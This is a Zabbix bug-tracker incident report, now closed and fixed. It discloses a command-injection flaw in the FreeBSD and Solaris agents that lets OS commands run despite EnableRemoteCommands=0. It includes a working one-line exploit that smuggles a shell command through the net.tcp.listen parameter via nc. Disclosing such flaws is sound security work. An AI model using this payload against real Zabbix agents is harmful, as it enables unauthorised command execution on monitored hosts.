Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-1032

Bypassing EnableRemoteCommands=0 in Zabbix Client.

    XMLWordPrintable

    Details

    • Type: Incident report
    • Status: Closed
    • Priority: Blocker
    • Resolution: Fixed
    • Affects Version/s: None
    • Fix Version/s: 1.6.6, 1.9.0 (alpha)
    • Component/s: Agent (G)
    • Labels:
      None

      Description

      Has been found a security vulnerability in Zabbix Client allowing to execute OS commands, even if EnableRemoteCommands is set to "0". This was tested on Zabbbix 1.6.5. The IP address check is not bypassed, so the attacker must come from (or spoof) a valid Zabbix Server. This bug exists only in FreeBSD and Solaris agents.

      In ./src/libs/zbxsysinfo/(freebsd|solaris)/net.c, a user defined variable "param" is used to create "command" which is executed.

      Exploit :
      $> echo "net.tcp.listen[80';id >/tmp/ID ; echo ']"|nc testbox 10050

      This will execute "id" on the client and write the result to /tmp/ID.

        Attachments

          Activity

            People

            Assignee:
            Unassigned Unassigned
            Reporter:
            igor Igor Danoshaites (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

              Dates

              Created:
              Updated:
              Resolved: